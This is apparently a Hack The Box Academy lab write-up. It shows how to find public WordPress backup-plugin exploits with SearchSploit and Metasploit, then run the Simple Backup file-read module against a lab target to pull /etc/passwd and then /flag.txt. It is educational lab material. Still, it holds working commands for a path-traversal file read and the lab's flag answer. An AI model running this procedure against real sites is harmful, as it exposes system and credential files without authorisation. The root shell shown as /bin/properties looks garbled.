Intro

In this intro to using public exploits, the task is: "Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file."

This box can be found in Hack The Box Academy (you will need active access to HTB Academy).

Research

First, we took our spawned target, 94.237.63.201:54310 (note: your target will be different), and opened it in a web browser, which showed us a WordPress site:

Screenshot: Public Exploits Site

We used this info to search SearchSploit for public exploits related to WordPress backup plugins and got the following results:

┌─[htb-ac-1145252@htb-erx4v1fgpb]─[~]
└──╼ $searchsploit wordpress backup
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
WordPress Core 2.2.3 - /wp-admin/edit.php?ba | php/webapps/30979.txt
WordPress Plugin / Joomla! Component XCloner  | php/webapps/35212.txt
WordPress Plugin Backup 2.0.1 - Information D | php/webapps/19524.txt
WordPress Plugin Backup and Restore 1.0.3 - A | php/webapps/50503.txt
Wordpress Plugin Backup Guard 1.5.8 - Remote  | php/webapps/50093.py
WordPress Plugin Backup Migration 1.2.8 - Una | php/webapps/51445.txt
WordPress Plugin BackUpWordPress 0.4.2b - Rem | php/webapps/4593.txt
WordPress Plugin Database Backup < 5.2 - Remo | php/remote/47187.rb
WordPress Plugin Database Backups 1.2.2.6 -  | php/webapps/49984.html
WordPress Plugin DB Backup - Arbitrary File D | php/webapps/35378.txt
WordPress Plugin Duplicator 1.4.6 - Unauthent | php/webapps/50992.txt
WordPress Plugin Recent Backups 0.7 - Arbitra | php/webapps/37752.txt
WordPress Plugin Shopping Cart for WordPress  | php/webapps/38159.txt
WordPress Plugin Simple Backup 2.7.11 - Multi | php/webapps/39883.txt
WordPress Plugin Supsystic Backup 2.3.9 - Loc | php/webapps/49545.txt
WordPress Plugin Total Upkeep 1.14.9 - Databa | multiple/webapps/49252.txt
WordPress Plugin WP BackupPlus - Database and | php/webapps/34124.txt
WordPress Plugin WP-DB Backup 1.6/1.7 - edit | php/webapps/28382.txt
Wordpress Plugin XCloner 4.2.12 - Remote Code | php/webapps/50077.py
WordPress Theme CherryFramework 3.1.4 - Backu | php/webapps/45896.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results

Among these results, the matching exploit is:

WordPress Plugin Simple Backup 2.7.11 - Multi | php/webapps/39883.txt

Metasploit also has a matching module; searching there gives:

[msf](Jobs:0 Agents:0) >> search exploit wordpress backup

Matching Modules
================

   #  Name                                                   Disclosure Date  Rank       Check  Description
   -  ----                                                   ---------------  ----       -----  -----------
   0  exploit/unix/webapp/joomla_akeeba_unserialize          2014-09-29       excellent  Yes    Joomla Akeeba Kickstart Unserialize Remote Code Execution
   1  exploit/multi/php/wp_duplicator_code_inject            2018-08-29       manual     Yes    Snap Creek Duplicator WordPress plugin code injection
   2  exploit/multi/http/wp_db_backup_rce                    2019-04-24       excellent  Yes    WP Database Backup RCE
   3  auxiliary/scanner/http/wp_simple_backup_file_read                       normal     No     WordPress Simple Backup File Read Vulnerability
   4  auxiliary/scanner/http/wp_total_upkeep_downloader      2020-12-12       normal     No     WordPress Total Upkeep Unauthenticated Backup Downloader
   5  auxiliary/scanner/http/wp_bulletproofsecurity_backups  2021-09-17       normal     No     Wordpress BulletProof Security Backup Disclosure
   6  exploit/multi/http/wp_plugin_backup_guard_rce          2021-05-04       excellent  Yes    Wordpress Plugin Backup Guard - Authenticated Remote Code Execution


Interact with a module by name or index. For example info 6, use 6 or use exploit/multi/http/wp_plugin_backup_guard_rce

Exploit Attempt #1

We select #3, auxiliary/scanner/http/wp_simple_backup_file_read (an auxiliary module rather than an exploit, so it has no check method), review its options, set RHOSTS and RPORT for our target, and run it. The module reads a file from the target and saves it to our host:

[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> show options

Module options (auxiliary/scanner/http/wp_simple_backup_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /etc/passwd      yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> set RHOSTS 94.237.63.201
RHOSTS => 94.237.63.201
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> set RPORT 54310
RPORT => 54310
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> check
[-] This module does not support check.
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> exploit

[+] File saved in: /home/htb-ac-1145252/.msf4/loot/20240625164127_default_94.237.63.201_simplebackup.tra_077024.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> exit

Exiting MSF, we look at the loot file. It is /etc/passwd, the module's default FILEPATH, which confirms the file read works but contains nothing useful for the task:

┌─[htb-ac-1145252@htb-erx4v1fgpb]─[~/.msf4/loot]
└──╼ $cat 20240625164127_default_94.237.63.201_simplebackup.tra_077024.txt 
root:x:0:0:root:/root:/bin/properties
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:102:MySQL Server,,,:/nonexistent:/bin/false
systemd-timesync:x:102:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:103:105:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:104:106:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:105:107::/nonexistent:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin

What Went Wrong?

So what went wrong? Nothing in the module itself: if we go back to its options in the Metasploit console, we never changed FILEPATH, so it read the default /etc/passwd. The task states that the flag is at /flag.txt, so we go back, change FILEPATH to /flag.txt, and our options now look like this:

[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> show options

Module options (auxiliary/scanner/http/wp_simple_backup_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /flag.txt        yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     94.237.63.201    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      54310            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

Exploit Attempt #2

We run the module again and get a new loot file:

[msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> exploit

[+] File saved in: /home/htb-ac-1145252/.msf4/loot/20240625170124_default_94.237.63.201_simplebackup.tra_307330.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Success - Flag Found

Checking the new loot file gives us the flag:

┌─[htb-ac-1145252@htb-erx4v1fgpb]─[~/.msf4/loot]
└──╼ $cat /home/htb-ac-1145252/.msf4/loot/20240625170124_default_94.237.63.201_simplebackup.tra_307330.txt
HTB{my_f1r57_h4ck}

Screenshot: Public Exploits Answer